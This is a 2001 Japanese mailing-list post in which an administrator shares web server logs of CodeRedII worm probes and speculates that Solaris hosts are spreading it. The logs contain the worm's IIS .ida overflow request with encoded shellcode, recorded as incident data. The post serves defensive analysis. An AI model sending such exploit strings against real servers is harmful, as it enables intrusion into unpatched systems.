[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[connect24h:03741] [FYI] CodeRedII の宿主は Solaris
- To: connect24h@xxxxxxxxxxxxxxxxxxxx
- Subject: [connect24h:03741] [FYI] CodeRedII の宿主は Solaris
- From: Minoru Hagiyama <hagiyama@xxxxxxxxxx>
- Date: Sun, 05 Aug 2001 14:30:20 +0900
はぎやまです。
CodeRedIIの情報が上がっていましたので、“[stalk:00731] Re: new
Worm?” にポストしたものをこちらにも送ります。
|FYI
|CodeRedIIの宿主は“Solaris”...
|
|Minoru Hagiyama wrote:
|
|> “Code Red”の攻撃パターンは、ランダムなIPアドレスに対して行われ
|> ると思いました。7/20,8/2以降のNNN..のタイプのログからもこの傾向
|> は間違っていないと考えていますが、少し調べてみます。
|
|CodeRedIIに感染したIISは、自ホストのAクラスIPアドレスに対してスキ
|ャンし、攻撃しますが、異なるAクラスアドレスへは攻撃しないと考えられ
|ます。しかし、これを超えて攻撃してくるホストが3つありました。以下は
|そのホストからのaccess logとhttp://uptime.netcraft.com/up/graph/
|で検索したホストの結果です。(1サンプルは不明)
|
|210.117.67.217 - - [05/Aug/2001:02:46:11 +0900] "GET
|/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u685
|8%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
|u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u0
|0=aHTTP/1.0" 404 205
|
|OS, Web Server and Hosting History for 210.117.67.217
|OS Server Last changed IP address Netblock Owner
|Solaris unknown 5-Aug-2001 210.117.67.217 KRNIC
|Solaris unknown 21-Jun-2001 210.117.67.217 Thrunet Co., Ltd
|
|210.117.67.216 - - [05/Aug/2001:05:34:57 +0900] "GET
|/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u685
|8%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
|u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u0
|0=a HTTP/1.0" 404 205
|
|OS, Web Server and Hosting History for 210.117.67.216
|OS Server Last changed IP address Netblock Owner
|Solaris unknown 5-Aug-2001 210.117.67.216 KRNIC
|
|CodeRedIIの宿主は“Solaris”と思われます。個々の感染したIIS
|ホストの対応も必要ですが、宿主を最初に止める必要がありそうです。
--
萩 山 実
hagiyama@xxxxxxxxxx
http://www.arsp.ne.jp/gw2/
------------------------------------------------------------------------
インフォシークに 『ファンドランキング』登場!! ってなに?
http://fund.infoseek.co.jp/Rfund_top.cfm?svx=971122